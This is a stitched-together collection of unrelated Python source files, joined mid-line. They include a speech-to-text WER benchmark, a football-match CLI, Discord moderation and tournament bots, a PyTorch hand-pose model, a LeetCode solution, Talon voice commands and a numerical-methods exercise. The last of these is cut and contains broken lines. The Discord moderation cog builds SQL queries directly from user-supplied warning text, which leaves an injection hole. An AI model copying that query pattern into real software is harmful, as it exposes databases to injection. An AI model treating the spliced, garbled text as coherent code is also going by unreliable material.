len(file_path) > 1 and file_path[len(file_path) - 1] != '/': file_path = file_path + '/' st_domain = simplified_ts_domain(file_path, file_name, study_type, study_id, start_date, study_except_code) st_domain.generate() if __name__ == "__main__": main()import argparse import logging import multiprocessing from concurrent.futures import ProcessPoolExecutor import editdistance from dataset import * from engine import * logging.basicConfig(format='%(asctime)s %(message)s') logging.getLogger().setLevel(logging.INFO) def _word_error_info(ref, decoded): """ Computes the number of errors for a given decoded transcription and the number of words in reference transcription. :param ref: Reference (true) transcription. :param decoded: Decoded (by speech-to-text engine) transcription. :return: Tuple of number of word errors and number of words in reference transcription. """ ref_words = ref.strip('\n ').lower().split() decoded_words = decoded.strip('\n ').lower().split() word_error_count = editdistance.eval(ref_words, decoded_words) return word_error_count, len(ref_words) def _process_chunk(engine_type, engine_params, data_chunk): """ Transcribes a chuck of data with a given engine and returns number of word errors and total number of words processed (number of words in reference transcriptions). :param engine_type: Type of speech-to-text engine. :param engine_params: Engine parameters. :param data_chunk: An array of tuples of path to a WAV file and its corresponding transcription. :return: Tuple of total number of word errors and total number of words processed. """ engine = ASREngine.create(engine_type, **engine_params) sum_word_error_count = 0 sum_word_count = 0 for path, ref_transcript in data_chunk: decoded = engine.transcribe(path) error_count, count = _word_error_info(ref_transcript, decoded) sum_word_error_count += error_count sum_word_count += count return sum_word_error_count, sum_word_count def _run(): """ Runs the benchmark. Processes a corpus of speech data with a set of speech-to-text engines and computes their average word error rate. """ engines_params = dict([(x, dict()) for x in ASREngines]) engines_params[ASREngines.MOZILLA_DEEP_SPEECH].update( model_path=os.path.expanduser(args.deep_speech_model_path), alphabet_path=os.path.expanduser(args.deep_speech_alphabet_path), language_model_path=os.path.expanduser(args.deep_speech_language_model_path), trie_path=os.path.expanduser(args.deep_speech_trie_path)) dataset = Dataset.create(args.dataset_type, os.path.expanduser(args.dataset_root)) logging.info('loaded %s with %f seconds of data' % (str(dataset), dataset.size_seconds())) # NOTE: Depending on how much RAM you have you might need to reduce this when benchmarking DeepSpeech as it consumes # lots of RAM (specially when decoding with language model is enabled). num_workers = multiprocessing.cpu_count() - 1 chunk_size = dataset.size() // num_workers for engine_type in ASREngines: logging.info('evaluating %s' % engine_type.value) # futures = [] # with ProcessPoolExecutor(num_workers) as pool: # for i in range(num_workers): # data_chunk = [dataset.get(j) for j in range(i * chunk_size, (i + 1) * chunk_size)] # future = pool.submit( # _process_chunk, # engine_type, # engines_params[engine_type], # data_chunk) # futures.append(future) # # word_error_info = [x.result() for x in futures] # word_error_count = sum([x[0] for x in word_error_info]) # word_count = sum([x[1] for x in word_error_info]) results = [] data_chunk = dataset.all_data() #[dataset.get(j) for j in range(i * chunk_size, (i + 1) * chunk_size)] results += [_process_chunk(engine_type, engines_params[engine_type], data_chunk)] word_error_count = sum([x[0] for x in results]) word_count = sum([x[1] for x in results]) logging.info('WER = %f' % (float(word_error_count) / word_count)) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--dataset_type', type=str, required=True) parser.add_argument('--dataset_root', type=str, required=True) parser.add_argument('--deep_speech_model_path', type=str, required=True) parser.add_argument('--deep_speech_alphabet_path', type=str, required=True) parser.add_argument('--deep_speech_language_model_path', type=str, required=True) parser.add_argument('--deep_speech_trie_path', type=str, required=True) args = parser.parse_args() _run() output/models/nist_data/atomic/id/schema_instance/nistschema_sv_iv_atomic_id_white_space_1_xsd/__init__.py from output.models.nist_data.atomic.id.schema_instance.nistschema_sv_iv_atomic_id_white_space_1_xsd.nistschema_sv_iv_atomic_id_white_space_1 import ( NistschemaSvIvAtomicIdWhiteSpace1, Out, ) __all__ = [ "NistschemaSvIvAtomicIdWhiteSpace1", "Out", ] import webbrowser import requests import click import datetime import dateutil.parser # import webbrowser BASE_URL = 'https://www.scorebat.com/video-api/v1/' response = requests.get(url=f'{BASE_URL}') @click.group() def cli(): """A CLI App to stay up-to-date to with football.""" @click.option('-t', '--match', help='Match title, ex: matches -t "PSG - Bayern Munich"') @cli.command() def matches(match: str): """Retrieves latest football matches, navigates to match URL if match title is passed in.""" days = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"] no_items = [] if response.status_code == 200: if match: for index, item in enumerate(response.json()): if match == item['title']: match_url = response.json()[index]['url'] webbrowser.open(match_url) else: print("{:<44} {:32} {:<1}".format('MATCH', 'DATE', 'COMPETITION')) print('--------------------------------------------------------------------------------------------------------------------') for index, item in enumerate(response.json()): no_items.append(index) reverse_no_items = sorted(no_items, key=int, reverse=True) for item in reverse_no_items: match_title = response.json()[item]['title'] competition = response.json()[item]['competition']['name'] formatted_date = dateutil.parser.parse(response.json()[item]['date']) date_obj = datetime.datetime.strptime(f'{formatted_date.hour}:{formatted_date.minute}', "%H:%M") int_day = datetime.date(year=formatted_date.year, month=formatted_date.month, day=formatted_date.day).weekday() date_string = f'{days[int_day]} {formatted_date.month}/{formatted_date.day}, {date_obj.strftime("%I:%M %p")}' print("{:<44} {:<32} {:<1}".format(match_title, date_string, competition)) print('--------------------------------------------------------------------------------------------------------------------') else: print(f'Could not get the APIs: {response.text}') if __name__ == '__main__': cli(prog_name='Sweaty Goals')tidy_puj.py #!/usr/bin/env python3 import sys import re for line in sys.stdin: line = re.sub(r'\^', 'ⁿ', line.rstrip()) line = re.sub(r'\|', '\u030d', line.rstrip()) line = re.sub(r'w', 'ṳ', line) line = re.sub(r'ẃ', 'ṳ́', line) line = re.sub(r'ẁ', 'ṳ̀', line) line = re.sub(r'w̄', 'ṳ̄', line) line = re.sub(r'w̃', 'ṳ̃', line) print(line) albertozurli/mammoth # Copyright 2022-present, , , , , . # All rights reserved. # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. import numpy # needed (don't change it) import importlib import os import sys import socket mammoth_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(mammoth_path) sys.path.append(mammoth_path + '/datasets') sys.path.append(mammoth_path + '/backbone') sys.path.append(mammoth_path + '/models') from datasets import NAMES as DATASET_NAMES from models import get_all_models from argparse import ArgumentParser from utils.args import add_management_args from datasets import ContinualDataset from datasets import get_dataset from models import get_model from utils.training import train from utils.best_args import best_args from utils.conf import set_random_seed import setproctitle import torch import uuid import datetime from utils.testing import load_model,eval100 def lecun_fix(): # Yann moved his website to CloudFlare. You need this now from six.moves import urllib opener = urllib.request.build_opener() opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib.request.install_opener(opener) def parse_args(): parser = ArgumentParser(description='mammoth', allow_abbrev=False) parser.add_argument('--model', type=str, required=True, help='Model name.', choices=get_all_models()) parser.add_argument('--load_best_args', action='store_true', help='Loads the best arguments for each method, ' 'dataset and memory buffer.') torch.set_num_threads(4) add_management_args(parser) args = parser.parse_known_args()[0] mod = importlib.import_module('models.' + args.model) if args.load_best_args: parser.add_argument('--dataset', type=str, required=True, choices=DATASET_NAMES, help='Which dataset to perform experiments on.') if hasattr(mod, 'Buffer'): parser.add_argument('--buffer_size', type=int, required=True, help='The size of the memory buffer.') args = parser.parse_args() if args.model == 'joint': best = best_args[args.dataset]['sgd'] else: best = best_args[args.dataset][args.model] if hasattr(mod, 'Buffer'): best = best[args.buffer_size] else: best = best[-1] get_parser = getattr(mod, 'get_parser') parser = get_parser() to_parse = sys.argv[1:] + ['--' + k + '=' + str(v) for k, v in best.items()] to_parse.remove('--load_best_args') args = parser.parse_args(to_parse) if args.model == 'joint' and args.dataset == 'mnist-360': args.model = 'joint_gcl' else: get_parser = getattr(mod, 'get_parser') parser = get_parser() args = parser.parse_args() if args.seed is not None: set_random_seed(args.seed) return args def main(args=None): lecun_fix() if args is None: args = parse_args() # Add uuid, timestamp and hostname for logging args.conf_jobnum = str(uuid.uuid4()) args.conf_timestamp = str(datetime.datetime.now()) args.conf_host = socket.gethostname() dataset = get_dataset(args) backbone = dataset.get_backbone(args.subclass) loss = dataset.get_loss() model = get_model(args, backbone, loss, dataset.get_transform()) if isinstance(dataset, ContinualDataset): train(model, dataset, args) # model_path = f"data/saved_model/{args.dataset[4:]}/model.pth.tar" # model = load_model(model,args) # eval100(model,args) if __name__ == '__main__': main() 0 # tests.test_file_rumi # Test file-based translation monitoring # # Author: # Created: Dec.6 2021 """ Test file-based translation monitoring """ ########################################################################## # Imports ########################################################################## cogs/mod.py import discord from discord.ext import commands import time, json, os from datetime import datetime from discord.utils import utcnow from datetime import timedelta class Moderation(commands.Cog): def __init__(self, bot): self.bot = bot f = open("settings.json") self.settings = json.load(f) f.close() @commands.command() @commands.has_permissions(kick_members=True) async def kick(self, ctx, user: discord.Member, *, reason=None): await user.kick(reason=reason) try: await user.send( f"😢 | You have been kicked from {ctx.guild.name} for reason {reason}" ) except: pass ch = self.bot.get_channel(int(os.environ["STAFF_CHAT"])) await ch.send(f"{user} has been kicked with reason {reason}") @commands.command() @commands.has_permissions(moderate_members=True) async def mute(self, ctx, user: discord.Member, *, args): reason = "Muted by " + ctx.author.name data = args.split(" ") print(args) minutes = 0 seconds = 0 hours = 0 days = 0 print(data) for a in data: if a.endswith("m"): minutes = int(a[:-1]) if a.endswith("s"): seconds = int(a[:-1]) if a.endswith("d"): days = int(a[:-1]) if a.endswith("h"): hours = int(a[:-1]) timeout_until = utcnow() + timedelta( minutes=minutes, seconds=seconds, days=days, hours=hours ) await user.edit(timeout_until=timeout_until) await user.send( f"U have been muted for {days} days {hours} hours {minutes} minutes {seconds} seconds" ) await ctx.send(f"{user.mention} muted!") @commands.command() @commands.has_permissions(moderate_members=True) async def unmute(self, ctx, user: discord.Member): await user.edit(timeout_until=None) await ctx.send(f"{user} unmuted.") @commands.command() @commands.has_permissions(ban_members=True) async def ban(self, ctx, user: discord.Member, *, reason=None): await user.ban(reason=reason) try: await user.send( f"😢 | You have been banned from {ctx.guild.name} for reason {reason}" ) except: pass ch = self.bot.get_channel(int(os.environ["STAFF_CHAT"])) await ch.send(f"{user} has been banned with reason {reason}") @commands.command() @commands.has_permissions(kick_members=True) async def warn(self, ctx, user: discord.User, *reason): cur = await self.bot.connection.cursor() print(reason) await cur.execute( f"INSERT into warns (user, reason, moderator) VALUES ('{user.id}', '{' '.join(list(reason))}', '{ctx.author.id}')" ) await ctx.send("I warned " + str(user)) @commands.command() async def warnings(self, ctx, user: discord.User): cur = await self.bot.connection.cursor() await cur.execute(f"SELECT * from warns WHERE user = '{user.id}'") r = await cur.fetchall() warns = "" for a in r: warns += ( f"Warned by {self.bot.get_user(int(a[2])).mention}. Reason: {a[1]}\n" ) emb = discord.Embed( title=f"{user}'s infractions", description=warns, color=discord.Color.green(), ) await ctx.send(embed=emb) @commands.command() async def purge(self, ctx, limit: int = 2): await ctx.channel.purge(limit=limit + 1) time.sleep(1) await ctx.send(f"Deleted {limit} messages", delete_after=2) async def setup(bot): await bot.add_cog(Moderation(bot)) 0 import discord from discord.ext import commands from alttprbot.database import srlnick from alttprbot.exceptions import SahasrahBotException from alttprbot.tournament import main, secondary from alttprbot.util import speedgaming from config import Config as c from ..util import checks # this module was only intended for the Main Tournament 2019 # we will probably expand this later to support other tournaments in the future class Tournament(commands.Cog): def __init__(self, bot): self.bot = bot async def cog_check(self, ctx): if ctx.guild is None: return False if ctx.guild.id in c.Tournament: return True else: return False @commands.command() @commands.has_any_role('Admin', 'Admins', 'Bot Admin') async def ccloadreg(self, ctx): if c.Tournament[ctx.guild.id]['tournament'] == 'secondary': await secondary.loadnicks(ctx) else: raise SahasrahBotException( 'This command only works for the Challenge Cup.') @commands.command( help="Generate a tournament race.", aliases=['restreamrace', 'tournyrace', 'tounyrace'] ) @checks.has_any_channel('testing', 'console', 'lobby', 'restreamers', 'sg-races', 'bot-console', 'bot-testing', 'bot-commands') async def tourneyrace(self, ctx, episode_number): logging_channel = discord.utils.get( ctx.guild.text_channels, id=c.Tournament[ctx.guild.id]['logging_channel']) if c.Tournament[ctx.guild.id]['tournament'] == 'main': try: seed, game_number, players = await main.generate_game(episode_number, ctx.guild.id) except main.SettingsSubmissionNotFoundException: await dm_all_players_sg(ctx, episode_number, f"Settings submission not found at . Please submit settings at for episode `{episode_number}`! Once complete, re-run `$tourneyrace` command or contact your setup helper to have command re-ran.") raise except main.InvalidSettingsException: await dm_all_players_sg(ctx, episode_number, f"Settings submitted for episode `{episode_number}` are invalid! Please contact a tournament administrator for assistance.") raise elif c.Tournament[ctx.guild.id]['tournament'] == 'secondary': seed, game_number, players = await secondary.generate_game(episode_number, ctx.guild.id) else: raise SahasrahBotException( 'This should not have happened. Ping Synack.') embed = await seed.embed( name=f"{players[0]['displayName']} vs. {players[1]['displayName']} - {game_number} - {episode_number}", emojis=self.bot.emojis ) tournament_embed = await seed.tournament_embed( name=f"{players[0]['displayName']} vs. {players[1]['displayName']} - {game_number} - {episode_number}", notes="The permalink for this seed was sent via direct message to each runner.", emojis=self.bot.emojis ) if c.Tournament[ctx.guild.id]['tournament'] == 'main' and 'commentary_channel' in c.Tournament[ctx.guild.id]: episode = await speedgaming.get_episode(int(episode_number)) broadcast_channels = [] for channel in episode['channels']: if not channel['name'] == "No Stream": broadcast_channels.append(channel['name']) if len(broadcast_channels) > 0: commentary_channel = discord.utils.get( ctx.guild.text_channels, id=c.Tournament[ctx.guild.id]['commentary_channel']) tournament_embed.insert_field_at( 0, name="Broadcast Channels", value=f"*{', '.join(broadcast_channels)}*", inline=False) embed.insert_field_at( 0, name="Broadcast Channels", value=f"*{', '.join(broadcast_channels)}*", inline=False) await commentary_channel.send(embed=tournament_embed) await logging_channel.send(embed=embed) await ctx.send(embed=tournament_embed) for player in players: try: if not player.get('discordId', '') == '': member = ctx.guild.get_member(int(player['discordId'])) else: member = await commands.MemberConverter().convert(ctx, player['discordTag']) await member.send(embed=embed) except discord.HTTPException: await logging_channel.send(f"@here Unable to send DM to {player['displayName']}") await ctx.send(f"Unable to send DM to {player['displayName']}") @commands.command() @commands.has_any_role('Admin', 'Admins', 'Bot Admin') async def loadroles(self, ctx, role: discord.Role, names): namelist = names.splitlines() for name in namelist: discord_users = await srlnick.get_discord_id(name) if discord_users is False: continue else: for discord_user in discord_users: member = ctx.guild.get_member( discord_user['discord_user_id']) if member is not None: await member.add_roles(role) async def dm_all_players_sg(ctx, episode_number, msg): episode = await speedgaming.get_episode(int(episode_number)) for player in episode['match1']['players']: try: if not player.get('discordId', '') == '': member = ctx.guild.get_member(int(player['discordId'])) else: member = await commands.MemberConverter().convert(ctx, player['discordTag']) await member.send(msg) except discord.HTTPException: pass def setup(bot): bot.add_cog(Tournament(bot)) guillaume-chevalier/ReuBERTsrc/domain/pipeline_steps/question_response_evaluator/yesno_question_response_evaluator.py import copy class YESNOQuestionProcessor(): def __init__(self): super().__init__() def extract_best_answer(self, question, bert_answers): return self._extract_from_uncertain_answers(bert_answers) def _extract_from_uncertain_answers(self, bert_answers): best_answer = [0, ''] for answer in bert_answers: if answer[0] > best_answer[0] and answer[1] != '': best_answer = copy.deepcopy(answer) return best_answer[1] russab0/distractor_generationsrc/utility/dataset.py0 import os import pickle from random import choice import nlp2 import numpy import numpy as np import torch from torch.utils import data from tqdm import tqdm from transformers import AutoTokenizer, BertTokenizer def check_type_for_dataloader(data_item): if (isinstance(data_item, list) and not isinstance(data_item[-1], str) and check_type_for_dataloader( data_item[-1])) or \ isinstance(data_item, str) or \ isinstance(data_item, numpy.ndarray) or \ isinstance(data_item, int): return True else: return False def get_dataset(file_path, model_class, parameter): panel = nlp2.Panel() all_arg = nlp2.function_get_all_arg_with_value(model_class.preprocessing_data) if parameter.get('panel'): for missarg in nlp2.function_check_missing_arg(model_class.preprocessing_data, parameter): panel.add_element(k=missarg, v=all_arg[missarg], msg=missarg, default=all_arg[missarg]) filled_arg = panel.get_result_dict() parameter.update(filled_arg) ds = LoadDataset(fpath=file_path, pretrained_config=parameter.get('config'), get_data_from_file=model_class.get_data_from_file, preprocessing_data=model_class.preprocessing_data, cache=parameter.get('cache'), input_arg=parameter) return ds class LoadDataset(data.Dataset): def __init__(self, fpath, pretrained_config, get_data_from_file, preprocessing_data, cache=False, input_arg={}): sample = [] if 'albert_chinese' in pretrained_config: tokenizer = BertTokenizer.from_pretrained(pretrained_config) else: tokenizer = AutoTokenizer.from_pretrained(pretrained_config) cache_path = fpath + "_" + pretrained_config.replace("/", "_") + ".cache" print(cache_path) if os.path.isfile(cache_path) and cache: with open(cache_path, "rb") as cf: outdata = pickle.load(cf) sample = outdata['sample'] task_dict = outdata['task'] else: task_dict = {} total_data = 0 for i in tqdm(get_data_from_file(fpath), desc='load dataset'): tasks, task, input_text, target, *other = i task_dict.update(tasks) for get_feature_from_data, feature_param in preprocessing_data(i, tokenizer, **input_arg): for feature in get_feature_from_data(**feature_param): feature = {k: v for k, v in feature.items() if check_type_for_dataloader(v)} sample.append(feature) total_data += 1 print("Processed " + str(total_data) + " data.") print('Cache', cache) if cache: with open(cache_path, 'wb') as cf: outdata = {'sample': sample, 'task': task_dict} pickle.dump(outdata, cf) self.sample = sample self.task = task_dict print('finished loading') def increase_with_sampling(self, total): inc_samp = [choice(self.sample) for _ in range(total - len(self.sample))] self.sample.extend(inc_samp) def __len__(self): return len(self.sample) def __getitem__(self, idx): self.sample[idx].update((k, np.asarray(v)) for k, v in self.sample[idx].items() if k != 'task') return self.sample[idx] ''' This is a project developed by MeGaCrazy (github: MeGaCrazy), who opend the code on github. We noted where the source code came from, u sed it, changed it to suit our needs, and implemented our software. ''' # author = __xiaofeng__ # date = 2019/11/1 # Some Constant Values used Over all sources codes PORT = int(5555) HOST = 'localhost' REGISTER = '1' SEARCH = '2' DOWNLOAD = '3' LIST_ALL = '4' EXIT = '7' LIST_LOCAL_FILES = '5' RECONNECT = '6' TIME_GAP = int(30) DETECT_TIME = int(3) REGISTER_CLIENT = "clientRegister" SERVER_LOGNAME = "server.log" CLIENT_LOGNAME = "client.log" import os import torch import torch.nn as nn from torchvision import models from torchvision.models.utils import load_state_dict_from_url from torchvision.models.resnet import Bottleneck, model_urls import copy import torch import torch.nn as nn from torchvision import models from torch.nn.parameter import Parameter device = torch.device("cuda" if torch.cuda.is_available() else "cpu") RHD2Bighand_skeidx = [0, 4, 8, 12, 16, 20, 3, 2, 1, 7, 6, 5, 11, 10, 9, 15, 14, 13, 19, 18, 17] # The GraphConv is designed based on RHD index for hand class GraphConv(nn.Module): def __init__(self, in_features, out_features): super(GraphConv, self).__init__() self.fc = nn.Linear(in_features=in_features, out_features=out_features) self.activation = nn.ReLU(inplace=True) self.I = torch.eye(21).float().to(device).unsqueeze(0) for i in range(5): start = i * 4 + 1 self.I[0, 0, start] = 1 self.I[0, start, 0] = 1 for j in range(3): self.I[0, start + j, start + 1 + j] = 1 self.I[0, start + 1 + j, start + j] = 1 self.I = Parameter(self.I, requires_grad=True) def laplacian(self, A_hat): D_hat = torch.sum(A_hat, 1, keepdim=True) + 1e-5 L = 1 / D_hat * A_hat return L def forward(self, x): batch = x.size(0) A_hat = self.laplacian(self.I) A_hat = A_hat.repeat(batch, 1, 1) out = self.fc(torch.matmul(A_hat, x)) return out class GraphConvBlock(nn.Module): def __init__(self, layers): super(GraphConvBlock, self).__init__() self.gcn_0 = GraphConv(layers[0], layers[1]) self.gcn_1 = GraphConv(layers[1], layers[2]) self.relu = nn.ReLU(inplace=True) def forward(self, x): # x = self.relu(self.gcn_0(x)) # x = self.relu(self.gcn_1(x)) x = self.gcn_0(x) x = self.gcn_1(x) return x class ResNet(models.ResNet): """ResNets without fully connected layer""" def __init__(self, *args, **kwargs): super(ResNet, self).__init__(*args, **kwargs) self._out_features = self.fc.in_features def forward(self, x): x = self.conv1(x) x = self.bn1(x) x = self.relu(x) x = self.maxpool(x) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = self.layer4(x) return x @property def out_features(self) -> int: """The dimension of output features""" return self._out_features def copy_head(self) -> nn.Module: """Copy the origin fully connected layer""" return copy.deepcopy(self.fc) def _resnet(arch, block, layers, pretrained, progress, **kwargs): model = ResNet(block, layers, **kwargs) if pretrained: model_dict = model.state_dict() pretrained_dict = load_state_dict_from_url(model_urls[arch], progress=progress) # remove keys from pretrained dict that doesn't appear in model dict pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict} model.load_state_dict(pretrained_dict, strict=False) return model def resnet101(pretrained=False, progress=True, **kwargs): r"""ResNet-101 model from `"Deep Residual Learning for Image Recognition" `_ Args: pretrained (bool): If True, returns a model pre-trained on ImageNet progress (bool): If True, displays a progress bar of the download to stderr """ return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress, **kwargs) class Upsampling(nn.Sequential): """ 3-layers deconvolution used in `Simple Baseline `_. """ def __init__(self, multi_channel=None, in_channel=2048, hidden_dims=(256, 256, 256), kernel_sizes=(4, 4, 4), bias=False): assert len(hidden_dims) == len(kernel_sizes), \ 'ERROR: len(hidden_dims) is different len(kernel_sizes)' layers = [] if multi_channel != None: layers.append(nn.Sequential(*[ nn.Conv2d(multi_channel, in_channel, kernel_size=1, stride=2, padding=0, dilation=1, bias=True), nn.BatchNorm2d(in_channel), nn.ReLU(inplace=True)])) for hidden_dim, kernel_size in zip(hidden_dims, kernel_sizes): if kernel_size == 4: padding = 1 output_padding = 0 elif kernel_size == 3: padding = 1 output_padding = 1 elif kernel_size == 2: padding = 0 output_padding = 0 else: raise NotImplementedError("kernel_size is {}".format(kernel_size)) layers.append( nn.ConvTranspose2d( in_channels=in_channel, out_channels=hidden_dim, kernel_size=kernel_size, stride=2, padding=padding, output_padding=output_padding, bias=bias)) layers.append(nn.BatchNorm2d(hidden_dim)) layers.append(nn.ReLU(inplace=True)) in_channel = hidden_dim super(Upsampling, self).__init__(*layers) # init following Simple Baseline for name, m in self.named_modules(): if isinstance(m, nn.ConvTranspose2d): nn.init.normal_(m.weight, std=0.001) if bias: nn.init.constant_(m.bias, 0) elif isinstance(m, nn.BatchNorm2d): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) class Decoder_head(nn.Module): """ decoder head for uv_heatmap and 2.5d heatmap 3 ConvTranspose2d in Unsampling default head has conv bn relu and conv """ def __init__(self, out_features=2048, num_head_layers=2, feature_dim=256, num_keypoints=21, is_drop=False, multi_channel=None): super(Decoder_head, self).__init__() self.upsampling = Upsampling(multi_channel, out_features) self.head = self._make_head(num_head_layers, feature_dim, num_keypoints, is_drop) @staticmethod def _make_head(num_layers, channel_dim, num_keypoints, is_drop=False, droprate=0.2): layers = [] for i in range(num_layers - 1): layers.extend([ nn.Conv2d(channel_dim, channel_dim, 3, 1, 1), nn.BatchNorm2d(channel_dim), nn.ReLU(), ]) if is_drop: layers.append(nn.Dropout2d(droprate)) layers.append( nn.Conv2d( in_channels=channel_dim, out_channels=num_keypoints, kernel_size=1, stride=1, padding=0 ) ) layers = nn.Sequential(*layers) for m in layers.modules(): if isinstance(m, nn.Conv2d): nn.init.normal_(m.weight, std=0.001) nn.init.constant_(m.bias, 0) return layers def forward(self, x): x = self.upsampling(x) x = self.head(x) return x class Decoder_mlp(nn.Module): def __init__(self, n_input = 2048, n_latent=128, n_keypoint=21): super(Decoder_mlp, self).__init__() self.n_keypoint = n_keypoint self.avgpool = nn.AdaptiveAvgPool2d((1, 1)) self.l=nn.Sequential(nn.Linear(n_input,n_latent),nn.ReLU(), nn.Linear(n_latent,n_latent),nn.ReLU(), nn.Linear(n_latent,n_latent),nn.ReLU(), nn.Linear(n_latent, n_keypoint*2),) def forward(self, x): x = self.avgpool(x) x = torch.flatten(x, 1) x = self.l(x).view(x.size(0),self.n_keypoint,2) return x class PoseResNet(nn.Module): def __init__(self, backbone, decoder, kinematic): super(PoseResNet, self).__init__() self.backbone = backbone self.decoder = decoder self.gcnn = kinematic def forward(self, x): x = self.backbone(x) x = self.decoder(x) x = self.gcnn(x) return x class KinematicLayer(nn.Module): def __init__(self, layers = [64*64, 64*64, 64*64], output_layer = 64*64): super(KinematicLayer, self).__init__() self.block_0 = GraphConvBlock(layers) self.block_1 = GraphConvBlock(layers) self.block_2 = GraphConv(layers[-1], output_layer) def forward(self, x): bs = x.size(0) x = x.view(bs, 21, -1) x = self.block_0(x) + x x = self.block_1(x) + x x = self.block_2(x).view(bs,21,64,64) # ! this should be RHD index # x = x[:,RHD2Bighand_skeidx,:] # ! convert the prediction to target index return x def pose_resnet101_heatmap(pretrained = True, num_keypoints = 21, num_head_layers = 1, is_drop=False): backbone = resnet101(pretrained=pretrained) decoder = Decoder_head(2048, num_head_layers, 256, num_keypoints, is_drop=is_drop) kinematic = KinematicLayer() model = PoseResNet(backbone, decoder, kinematic) return model if __name__ == '__main__': model = pose_resnet101_heatmap().cuda() optimizer = torch.optim.Adam(model.parameters()) for i in range(1000): print(i) x = torch.randn([32, 3, 256, 256]).cuda() out = model(x) loss = torch.mean(out) optimizer.zero_grad() loss.backward() optimizer.step()class Solution(object): def generateAbbreviations(self, word): """ :type word: str :rtype: List[str] """ def dfs(w, start, res): res.append(w) for i in xrange(start, len(w)): for l in xrange(1, len(w) - i + 1): lstr = str(l) llen = len(lstr) dfs(w[:i] + lstr + w[i+l:], i + 2 + llen - 1, res) res = [] dfs(word, 0, res) return res1-10 # Talon voice commands for interacting with Postbox mail # from talon.voice import Key, Context ctx = Context("postbox", bundle="com.postbox-inc.postbox") ctx.keymap( { "new mail": Key("cmd-n"), "send mail": Key("cmd-shift-d"), "reply mail": Key("cmd-r"), "reply all": Key("shift-cmd-r"), "forward mail": Key("cmd-l"), "mark unread": Key("m"), "mark read": Key("r"), "star": Key("s"), "delete mail": Key("backspace"), "archive mail": Key("a"), "next mail": Key("f"), "previous mail": Key("b"), "next unread": Key("n"), "previous unread": Key("p"), "top list": Key("fn-left"), "bottom list": Key("fn-right"), } ) exercicio1.py # Exercicio 1 - Teste # MAP3122 - Métodos Numéricos e Aplicações # Resolvido por: # NUSP - 11257522 # S.F NUSP - 11257539 import numpy as np import matplotlib.pyplot as plt import matplotlib.image as mpimg # Valores globais para Runge-Kutta 4 A = np.array([[-2,-1,-1,-2],[1,-2,2,-1],[-1,-2,-2,-1],[2,-1,1,-2]]) # Funcoes Runge Kutta def funcao_kutta4(t,x): return np.dot(A,x) def funcao_exata_kutta4(t): funcao = [] funcao_1 = np.e**(-t)*np.sin(t) + np.e**(-3*t)*np.cos(3*t) funcao_2 = np.e**(-t)*np.cos(t) + np.e**(-3*t)*np.sin(3*t) funcao_3 = -np.e**(-t)*np.sin(t) + np.e**(-3*t)*np.cos(3*t) funcao_4 = -np.e**(-t)*np.cos(t) + np.e**(-3*t)*np.sin(3*t) funcao.extend([funcao_1,funcao_2,funcao_3,funcao_4]) return(funcao) # Valores globais para euler t = np.linspace(1.1, 3.0, 5000) x = t**2 + 1/(1-t) # Funcoes Euler def funcao_euler(t,x): return 2*t+(x-t**2)**2 def funcao_exata_euler(t): return t**2 + 1/(1-t) # Metodo de Runge Kutta 4 # retorna somatoria CpKp def funcao_phi(t,x,h): # coeficientes k1 = funcao_kutta4(t,x) k2 = funcao_kutta4(t+h/2,x+h/2*k1) k3 = funcao_kutta4(t+h/2,x+h/2*k2) k4 = funcao_kutta4(t+h,x+h*k3) k_total = (k1)/6+(k2)/3+(k3)/3+(k4)/6 return(k_total) # Realiza o algoritmo de Runge Kutta 4 def runge_kutta4(t_inicial, t_final, x_inicial, h): solucao = [] solucao = np.insert(solucao, len(solucao), t_inicial) solucao = np.insert(solucao, len(solucao), x_inicial) tn = t_inicial xn = x_inicial while tn < t_final: v_aux = [] xn1 = xn + h*funcao_phi(tn,xn,h) xn = xn1 v_aux.append(tn) v_aux.extend(xn) solucao = np.vstack((solucao, v_aux)) tn += h return(solucao) # Funcao que devolve E1,n(t) := max 1 guarda_valor): guarda_valor = dif_abs guarda_j = j j = guarda_j # Pega a funcao com maior erro for i in range (len(solucao)): t = solucao[i,0] dif_abs = abs(solucao[i,j] - funcao_exata_kutta4(t)[j]) if(i == 0): erro.extend([t, dif_abs]) else: erro = np.vstack((erro, [t,dif_abs])) return(erro) # Devolve a lista de erros com n igual a 20,40,80,160,320 e 640 def lista_erro_rk4(): n = [20,40,80,160,320,640] h = [2/20,2/40,2/80,2/160,2/320, 2/640] erro_1 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[0])) erro_2 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[1])) erro_3 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[2])) erro_4 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[3])) erro_5 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[4])) erro_6 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[5])) erro = [erro_1, erro_2, erro_3, erro_4, erro_5, erro_6] return(erro) # Funcao que plota o erro de Runge Kutta e tambem salva def plota_erro(): erro = lista_erro_rk4() n = [20,40,80,160,320,640] tamanho = len(erro)-1 for i in range(tamanho): funcao = erro[i] fig, ax = plt.subplots() ax.plot(funcao[:,0], funcao[:,1], 'tab:purple') ax.set_title("Erro com n igual a " + str(n[i])) plt.savefig("solucao_" +"rungekutta4_" + str(i) + ".jpg",bbox_inches='tight') print("Imagem Salva!") plt.show() # Funcao que calcula o R def calcula_R_rk4(): erro = lista_erro_rk4() for i in range(5): R_i = (np.amax(erro[i], axis=1)[1])/(np.amax(erro[i+1], axis=1)[1]) print(R_i) # Metodo de Euler Implicito def euler_implicito(t_inicial, t_final, x_inicial, h): # faz a matriz solucao solucao = [] solucao = np.insert(solucao, len(solucao), t_inicial) solucao = np.insert(solucao, len(solucao), x_inicial) # valores iniciais tn = t_inicial xn = x_inicial # interacao metodo de euler while tn < t_final: tn += h xn1 = xn + h*funcao_euler(tn, xn+h) xn = xn1 solucao = np.vstack([solucao,[tn, xn]]) return(solucao) # Funcao que calcula 